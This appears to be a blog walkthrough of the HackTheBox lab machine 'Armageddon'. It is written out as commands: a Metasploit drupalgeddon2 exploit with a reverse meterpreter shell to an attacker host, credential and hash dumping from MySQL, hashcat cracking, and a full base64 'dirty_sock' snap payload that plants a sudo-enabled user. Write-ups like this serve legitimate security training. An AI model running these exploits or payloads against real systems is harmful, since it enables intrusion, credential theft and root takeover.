Armageddon HackTheBox WalkThrough

This is Armageddon HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Armageddon HackTheBox machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.233 and difficulty easy assigned by its maker.

First of all connect your PC with HackTheBox VPN and make sure your connectivity with Armageddon machine by pinging its IP 10.10.10.233. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -sV -sT -oA nmap/Armageddon 10.10.10.233

Nmap found ports 22 and 80 as open. OpenSSH 7.4 is running on port 22 and Apache2 web server is running on port 80. Also, nmap script http-generator revealed that the website hosted on this web server is created using Drupal 7 CMS. Drupal is an Open Source CMS which gives us facility to create attractive website just like WordPress CMS. Ongoing to the URL http://10.10.10.233 found Drupal Login page.

I wanted to find the exact version of this CMS so that I can search for available exploits. Ongoing to the URL http://10.10.10.233/robots.txt found /Changelog.txt file. Changelog.txt file usually includes records of changes such as bug fixes, new features, etc., added to the application. Ongoing to http://10.10.10.233/CHANGELOG.txt found that installed version of Drupal is 7.56 which was released on 21st of June 2017.

Tip: Whenever you find that any Open Source CMS is being used simply go to their GitHub repository and check their directory structure and then check for the same file in your vulnerable website. Don’t directory bruteforce on the vulnerable site because in Open Source CMS everything is publicly available.

Let us search for available exploits using $ searchsploit.

Searching for Drupal Exploits

$ searchsploit drupal 7.56

Searchsploit found many number of exploits. My first focus was on Metasploit because it makes our work a lot easier. When I searched Drupal exploit in metasploit it found many exploits. Drupalgeddon was my focus because its suffix matches with this machine name. After some trial and error I got the exploit exploit/unix/webapp/drupal_drupalgeddon2 worked and gave me shell. So let us get user shell.

Getting User Shell

msf6 > search drupal

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.10

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

meterpreter > sysinfo

We have successfully got user shell. Let us upgrade the shell to fully qualified Linux shell so that we can proceed for higher level task.

Upgrading Shell

meterpreter > shell

~/bin/bash -i

bash-4.2$ export TERM=xterm

Note: $ python3 -c 'import pty; pty.spawn("/bin/bash")' won’t work.

After some initial enumeration found some database login credential inside file settings.php.

$ cat /var/www/html/sites/default/settings.php

The credentials are:

database : drupal

username : drupaluser

password : [email protected]*m23gBVj

host : localhost

port : 3306

driver : mysql

My next step is to find whether any database server is running locally so that I can use this credentials to dump other user’s login credential.

$ netstat -punta

$ netstat command found that port 3306 is listening locally. So let us login into MySQL server and see what is present there.

logging into mysql & dumping user creds

Since we don’t have a fully qualified Linux shell that why we can’t spawn MySQL prompt. We have to run SQL command in one line. For more info on using MySQL command in one line check this article.

$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -e 'show databases;'

$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -D drupal -e 'show tables;'

$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -D drupal -e 'select name,pass from users;'

———–Snip————

We got hash of user brucetherealadmin which is $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt. Let us identify the hash so that we can go for cracking using $ hashcat (an offline password cracker).

Identifying Hash

Hash identifier found its algorithm to be of Drupal7. Let us crack it.

Cracking Hash

$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' /usr/share/wordlists/rockyou.txt

$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' –show

—————–Snip—————–

Hashcat found password of brucetherealadmin to be booboo. Let us check whether brucetherealadmin user exist or not.

$ cat /etc/passwd | grep /bash

It exist and it also has bash shell. Let us SSH into it using $ssh (OpenSSH remote login client) command.

SSH into user Brucetherealadmin

$ ssh [email protected]

~booboo

We are now logged in as user brucetherealadmin. Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$ sudo -l

$ sudo -l command revealed that user brucetherealadmin can run (root) NOPASSWD: /usr/bin/snap install * on armageddon as root. In other words, we can say that user brucetherealadmin can install any snap package in armageddon. You can think snap package like a docker package. Snap packages are complete in itself along with their dependencies and run in sandboxed environment in different Linux distributions. For more info check this video on YouTube.

$ snap version command revealed the installed version of snap and snapd to be 2.47.1-1.e17.

After some googling found a local privilege escalation exploit for snapd 2.47. For more details on how this exploit work and about vulnerability check this link. When I tried to get root shell using this exploit I would easily got root. So here our potential PrivEsc vector is Privilege Escalation by Exploiting Known Vulnerability in Software and the software is snapd.

To get root shell do the following.

Getting Root Shell

$ cd /dev/shm/

$ python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > exploit.snap

$ ls

$ sudo /usr/bin/snap install --devmode exploit.snap

$ su dirty_sock

~dirty_sock

$ sudo -i

# whoami && id

We are root now. Let us capture root flag.

Capture Root Flag

$ cat root.txt

This was how I rooted to Armageddon HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and walkthrough related doubt feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.